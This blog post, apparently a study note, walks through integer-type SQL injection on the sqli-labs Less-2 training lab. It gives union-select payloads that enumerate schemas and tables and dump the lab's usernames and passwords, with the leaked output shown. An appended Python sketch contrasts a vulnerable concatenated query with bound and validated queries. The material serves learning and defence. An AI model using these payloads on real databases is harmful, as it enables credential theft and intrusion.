SQL integer-type injection

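Database injection assessment workflow

1. Determine whether an injection point exists
2. Determine the injection type
3. Check whether the statement can be modified
4. Check whether the modified statement executes
5. Check whether the desired data can be retrieved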

Database injection statements (sqllab_less2)

1. Check the columns: union select 1,2,3
2. List all databases: union select 1,group_concat(schema_name),3 from information_schema.schemata #
information_schema,challenges,mysql,performance_schema,security

3. Query the current database: union select 1,database(),3 #

security

4. List the tables in the current database: union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #

emails,referers,uagents,users

5. List the columns of the users table: union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users' #

id,username,password

6. Query a single username,password: union select 1,username,password from security.users #

7. Query all username,password values: union select 1,group_concat(username),group_concat(password) from security.users #

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

8. Show each username paired with its password: union select 1,group_concat(concat_ws(':',username,password)),3 from security.users #
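
Added example (not part of the original post): integer-type injection arises when a numeric parameter is concatenated into the query unquoted, which is what lets the union statements above run. The Python sketch below uses an in-memory SQLite table with constructed rows as a stand-in for the lab's MySQL `users` table; the function names are hypothetical. It runs the step 6 payload against a concatenated query, a bound-parameter query, and a query that validates the id before binding it.

```python
import re
import sqlite3

def make_db():
    # Constructed sample rows; in-memory SQLite stands in for the lab's MySQL table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw-one"), (2, "bob", "pw-two")])
    return db

def lookup_vulnerable(db, raw_id):
    # Integer-type injection: the value is pasted in unquoted, so everything
    # after the number is parsed as SQL.
    sql = f"SELECT id, username, password FROM users WHERE id={raw_id}"
    return db.execute(sql).fetchall()

def lookup_bound_only(db, raw_id):
    # Binding alone: the whole string is compared as data and matches no id.
    sql = "SELECT id, username, password FROM users WHERE id=?"
    return db.execute(sql, (raw_id,)).fetchall()

def lookup_hardened(db, raw_id):
    # Layer 1: allow-list the parameter as a short run of ASCII digits.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a non-negative integer")
    # Layer 2: bind the value so it can never be parsed as SQL text.
    sql = "SELECT id, username, password FROM users WHERE id=?"
    return db.execute(sql, (int(raw_id),)).fetchall()

# Step 6 payload from the walkthrough, minus the schema prefix and trailing '#'.
PAYLOAD = "-1 union select 1,username,password from users"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))   # leaks every row
    print("bound only:", lookup_bound_only(db, PAYLOAD))   # no rows
    try:
        lookup_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("hardened:  rejected,", exc)
    print("legit id=1:", lookup_hardened(db, "1"))
```

Rejecting the request at validation time also gives the application a clean point to log the malformed id for detection.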


posted @ 2021-06-06 02:38  MuRKuo